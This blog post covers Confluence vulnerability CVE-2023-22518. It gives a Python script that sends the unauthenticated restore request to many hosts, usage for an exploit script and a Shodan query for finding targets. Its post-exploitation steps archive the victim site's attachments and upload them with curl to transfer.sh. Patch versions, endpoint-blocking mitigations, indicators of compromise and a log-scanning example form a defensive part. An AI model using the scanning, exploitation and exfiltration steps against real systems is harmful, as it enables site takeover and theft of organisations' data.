Unmasking CVE-2023-22518: A Critical Security Breach in Confluence Data Center and Server

A new critical vulnerability in Atlassian Confluence has drawn immediate attention from the security community.

The flaw, tracked as CVE-2023-22518, is an improper authorization vulnerability in Confluence Data Center and Server.

It is a pressing concern not only because it can disrupt the service, but because it is being exploited in the wild, including by Cerber ransomware.

This blog post examines the vulnerability, its implications, and the steps to detect and mitigate it.

Unpacking CVE-2023-22518

CVE-2023-22518 is an improper authorization weakness: set-up and restore endpoints that should only be reachable by a site administrator can be called without any authentication. It is actively exploited by criminals, and the compromises observed so far have ended in ransomware.

The vulnerability allows an unauthenticated attacker to reset a Confluence instance by importing their own site backup, thereby creating a Confluence instance administrator account under their control. The reset destroys the existing site content, and the new administrator can then install plugins, which is how web shells and ransomware payloads follow.

Assessing The Threat Level

The severity of this vulnerability cannot be overstated. Atlassian initially rated it 9.1 and then raised it to the maximum CVSS score of 10 once active exploitation was confirmed.

Exploitation results in unauthenticated administrative access to the Confluence instance, and therefore in loss of the site's data and exposure of anything the attacker can reach from there.

Scope of The Vulnerability

The vulnerability affects all versions of Confluence Data Center and Server released before the fixes listed below, making it a widespread problem. Atlassian-hosted Confluence Cloud sites (atlassian.net) are not affected.

Understanding the Exploitation Class and Known Attack Vectors

This vulnerability falls under the Improper Authorization weakness class, listed as CWE-285 / CWE-266.

The known attack vectors are the following endpoints:

/json/setup-restore.action
/json/setup-restore-local.action
/json/setup-restore-progress.action
/server-info.action

Testing for Vulnerability using Python

A Python script for checking exposure has been shared by a user on GitHub.

The script sends the same multipart POST an exploit would send, but with a junk "zip" body instead of a real Confluence export. A vulnerable instance accepts the unauthenticated request and fails only when it goes looking for exportDescriptor.properties inside the archive, so no restore takes place; a patched instance rejects the request before that point. The check therefore keys on that error text:

import requests
import random
import string
import argparse
import urllib3

# Confluence is frequently fronted by self-signed TLS; verify=False is used below,
# so silence the warning it would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Endpoints listed as known attack vectors for CVE-2023-22518.
PATHS = [
    "/json/setup-restore.action",
    "/json/setup-restore-local.action",
    "/json/setup-restore-progress.action",
    "/server-info.action",
]
BOUNDARY = "----WebKitFormBoundaryT3yekvo0rGaL9QR7"


def random_string(length=10):
    """Random lowercase name for the fake upload, so each probe is distinguishable in logs."""
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))


def post_setup_restore(baseurl):
    """POST a bogus site export to each endpoint and report whether it was processed."""
    for path in PATHS:
        url = f"{baseurl.rstrip('/')}{path}"

        headers = {
            # Standard Atlassian header that tells the server to skip the XSRF token check.
            "X-Atlassian-Token": "no-check",
            "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        }

        # Hand-built multipart body: the same three fields the restore form submits,
        # with random junk in place of a real .zip export.
        rand_str = random_string()
        data = (
            f"--{BOUNDARY}\r\n"
            "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
            "true\r\n"
            f"--{BOUNDARY}\r\n"
            f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
            f"{rand_str}\r\n"
            f"--{BOUNDARY}\r\n"
            "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
            "Upload and import\r\n"
            f"--{BOUNDARY}--\r\n"
        )

        try:
            response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

            # A vulnerable instance tries to open the junk archive and complains that
            # exportDescriptor.properties is missing; a patched one never gets that far.
            if (response.status_code == 200 and
                'The zip file did not contain an entry' in response.text and
                'exportDescriptor.properties' in response.text):
                print(f"[+] Vulnerable to CVE-2023-22518 at {url}!")
            else:
                print(f"[-] Not vulnerable to CVE-2023-22518 at {url}.")
        except requests.RequestException as e:
            print(f"[*] Error connecting to {url}. Error: {e}")


def main():
    parser = argparse.ArgumentParser(description="Check Confluence instances for CVE-2023-22518")
    parser.add_argument('--url', help='Base URL of a single Confluence instance', required=False)
    parser.add_argument('--file', help='File containing one base URL per line', required=False)
    args = parser.parse_args()

    if args.url:
        post_setup_restore(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    post_setup_restore(url)
    else:
        print("You must provide either --url or --file argument.")


if __name__ == "__main__":
    main()

Using the Exploit

The checker above only probes; a separate interactive exploit script (not reproduced here) performs the actual reset. It is started with:

python3 exploit.py

It then prompts for the target's restore endpoint and for a Confluence XML site export prepared by the attacker. That export, once imported through the unauthenticated endpoint, replaces the site and supplies the administrator account the attacker logs in with:

URL: http://REDACTED:8090/json/setup-restore.action?synchronous=true
Path to the .zip file: /path/xmlexport-20231109-060519-1.zip

The following Shodan query finds internet-exposed Confluence instances by their favicon:

http.favicon.hash:-305179312

Note that the favicon hash only fingerprints the product, not the version: every hit still has to be checked against the fixed versions listed below or with the script above.

The reset replaces the site's database content, but the attachment store on disk is untouched: after exploiting the vulnerability you will find %CONFLUENCE_HOME%/attachments still full of the original site's files.

Confluence stores attachments under numeric content IDs with a version suffix rather than their original names and extensions, so the type of each file has to be recovered from its contents. The Linux file command does this from the magic bytes.

For instance:

file /var/lib/confluence/attachments/v4/191/28/77273124/77273124.1

The result might be:

/var/lib/confluence/attachments/v4/191/28/77273124/77273124.1: PNG image data, 442 x 170, 8-bit/color RGBA, non-interlaced
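Running file on one attachment at a time does not scale to a real attachment store, so here is an added example (not part of the original post or of any Confluence tooling) that does the same magic-byte classification over a whole attachments tree in Python. The directory layout it constructs mirrors the v4/.../<id>/<id>.<version> path shown above; the sample files and their contents are constructed for the demo, and the signature table only covers a handful of common types, leaving everything else as "unknown" for file(1) to look at.

```python
import os
import shutil
import tempfile
from collections import Counter

# (offset, magic bytes, extension). Deliberately short: common document and image
# types, plus two executable formats so planted binaries stand out in the summary.
SIGNATURES = [
    (0, b"\x89PNG\r\n\x1a\n", "png"),
    (0, b"\xff\xd8\xff", "jpg"),
    (0, b"GIF87a", "gif"),
    (0, b"GIF89a", "gif"),
    (0, b"%PDF-", "pdf"),
    (0, b"PK\x03\x04", "zip"),                               # also docx/xlsx/pptx (OOXML is a zip)
    (0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "doc"),         # OLE2 container: doc/xls/ppt
    (0, b"\x7fELF", "elf"),
    (0, b"MZ", "exe"),                                       # PE/DOS header; two bytes, so weak on its own
]
HEADER_LEN = 16  # longest signature above is 8 bytes; read a little more for safety


def sniff_extension(header: bytes) -> str:
    """Return the extension implied by the file's leading bytes, or 'unknown'."""
    for offset, magic, ext in SIGNATURES:
        if header[offset:offset + len(magic)] == magic:
            return ext
    return "unknown"


def classify_tree(root: str) -> dict:
    """Map every regular file under root (e.g. %CONFLUENCE_HOME%/attachments) to a sniffed extension."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                header = fh.read(HEADER_LEN)
            results[path] = sniff_extension(header)
    return results


def summarize(results: dict) -> Counter:
    """Count files per detected type; a stray 'elf' or 'exe' here deserves a look."""
    return Counter(results.values())


# Constructed attachment store: three versioned attachment files with fake contents.
SAMPLES = {
    "v4/191/28/77273124/77273124.1": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "v4/191/28/77273125/77273125.1": b"%PDF-1.7\n%constructed sample\n",
    "v4/191/29/77273200/77273200.2": b"PK\x03\x04" + b"\x00" * 26,
}


def demo() -> dict:
    """Build the constructed tree in a temp dir, classify it, and return {relative path: extension}."""
    root = tempfile.mkdtemp(prefix="attachments-")
    try:
        for rel, content in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        classified = classify_tree(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): ext for p, ext in classified.items()}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    classified = demo()
    for rel, ext in sorted(classified.items()):
        print(f"{rel}: {ext}")
    print(summarize(classified))
```

Point classify_tree at the real attachments directory instead of the constructed one and the returned mapping is what you would feed into a rename or copy step; the extension-less names are the reason ordinary tools cannot open the files directly.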

Archiving and Extracting Directories

Here's how to archive the attachments directory in one step:

tar -czvf /var/atlassian/application-data/confluence/attachments_backup.tar.gz /var/atlassian/application-data/confluence/attachments

Then upload the resulting archive (the path must match the one given to tar above):

curl --upload-file /var/atlassian/application-data/confluence/attachments_backup.tar.gz https://transfer.sh/attachments_backup.tar.gz

The result will be a downloadable link like this:

https://transfer.sh/***********/attachments_backup.tar.gz

Addressing The Issue: Patched Versions

Atlassian has released fixed versions: 7.19.16, 8.3.4, 8.4.4, 8.5.3 and 8.6.1 (or later in each release line).

Anyone running an earlier version is advised to upgrade to one of these fixed versions immediately.

Steps To Mitigate The Risk

For those unable to patch promptly, the following temporary mitigations are recommended:

  1. Back up your instance so that a destructive reset can be recovered from.
  2. If possible, disconnect the instance from the internet until the patch can be applied.
  3. If that is not feasible, reduce the known attack vectors by blocking access to the following endpoints: /json/setup-restore.action, /json/setup-restore-local.action and /json/setup-restore-progress.action. Because the attacker is unauthenticated, the block has to be enforced in front of Confluence, at the reverse proxy, WAF or network layer, not by a Confluence permission setting.

Identifying The Threat

It is crucial to review all affected Confluence instances for signs of compromise. Indicators include:

  • Inability to log in to the instance
  • Network access logs showing requests to /json/setup-restore*
  • Installation of unknown plugins
  • Presence of a malicious plugin named web.shell.Plugin
  • Encrypted or corrupted files
  • Unexpected additions to the confluence-administrators group
  • Creation of new user accounts without authorization.

If any of these appear, treat the instance as compromised rather than merely vulnerable: patching afterwards closes the entry point but does not remove an administrator account or plugin the attacker has already installed.
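Of the indicators above, the access-log one is the easiest to check at scale. The following is an added example (not part of the original post) that scans reverse-proxy access logs in combined log format for the endpoints this post lists, separating an accepted POST to setup-restore (a likely reset) from mere probing, and also flagging uploads to the Universal Plugin Manager's /rest/plugins/1.0/ endpoint, which is how a new administrator installs plugins. The log lines, addresses and timestamps are constructed for the demo; the log format is assumed to be the standard combined format, so adjust LOG_RE if your proxy logs differently.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Standard combined log format: ip ident user [time] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample: one source probes, resets the site and installs a plugin;
# a second source only hits a blocked endpoint; one line is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Nov/2023:10:41:02 +0000] "GET /server-info.action HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [03/Nov/2023:10:41:05 +0000] "POST /json/setup-restore.action?synchronous=true HTTP/1.1" 200 1893 "-" "python-requests/2.31.0"
203.0.113.7 - - [03/Nov/2023:10:41:20 +0000] "POST /rest/plugins/1.0/?token=REDACTED HTTP/1.1" 202 88 "-" "python-requests/2.31.0"
198.51.100.23 - - [03/Nov/2023:10:42:10 +0000] "GET /display/HOME/Welcome HTTP/1.1" 200 41233 "-" "Mozilla/5.0"
198.51.100.23 - - [03/Nov/2023:10:43:33 +0000] "GET /json/setup-restore-progress.action HTTP/1.1" 403 0 "-" "curl/8.4.0"
"""


@dataclass
class Finding:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    tag: str      # setup-restore-accepted | setup-restore-probe | server-info | plugin-install


def parse_line(line: str):
    """Return the matched fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(method: str, path: str, status: int):
    """Map one request to an indicator tag, or None if it is not interesting."""
    bare = path.split("?", 1)[0]          # drop the query string (e.g. ?synchronous=true)
    if bare.startswith("/json/setup-restore"):
        # Only a 200 on a POST means the server actually processed an upload;
        # anything else (403, 404, redirect, GET) is reconnaissance or a blocked attempt.
        if method == "POST" and status == 200:
            return "setup-restore-accepted"
        return "setup-restore-probe"
    if bare == "/server-info.action":
        return "server-info"
    if bare.startswith("/rest/plugins/1.0") and method in ("POST", "PUT"):
        return "plugin-install"
    return None


def scan_log(text: str) -> list:
    """Scan log text and return one Finding per indicator hit, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        status = int(rec["status"])
        tag = classify(rec["method"], rec["path"], status)
        if tag:
            findings.append(Finding(rec["ip"], rec["ts"], rec["method"], rec["path"], status, tag))
    return findings


def by_source(findings: list) -> dict:
    """Group findings per client IP so a reset followed by a plugin upload is seen as one actor."""
    grouped = defaultdict(list)
    for f in findings:
        grouped[f.ip].append(f)
    return dict(grouped)


if __name__ == "__main__":
    for ip, hits in by_source(scan_log(SAMPLE_LOG)).items():
        tags = ", ".join(h.tag for h in hits)
        print(f"{ip}: {len(hits)} hit(s) -> {tags}")
```

A source that shows setup-restore-accepted followed by plugin-install is the full chain described in this post; a source with only setup-restore-probe against a 403 is evidence that the endpoint block above is doing its job. Nothing here proves a reset succeeded on its own, so confirm against the remaining indicators (administrator group membership, installed plugins) before closing the case.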

Conclusion

CVE-2023-22518 is a reminder of how much damage a single missing authorization check can do when it sits in front of a site-wide reset.

This improper authorization vulnerability in Confluence Data Center and Server lets an unauthenticated attacker take over the instance, and the observed follow-on activity has been data loss and ransomware.

Understanding how the flaw is exploited, patching to a fixed version, and applying the interim mitigations where patching must wait are what limit the damage.

The Python script in this post is a quick way to test whether your Confluence servers still accept the unauthenticated restore request.

The Shodan query helps enumerate exposed instances, and the Linux file command helps recover the types of attachment files that survive a reset on disk.

Lastly, keep regular backups of the instance and its attachment store, held somewhere an attacker with Confluence administrator rights cannot reach.

New threats of this kind emerge constantly; staying informed and patching promptly remain the best defense against them.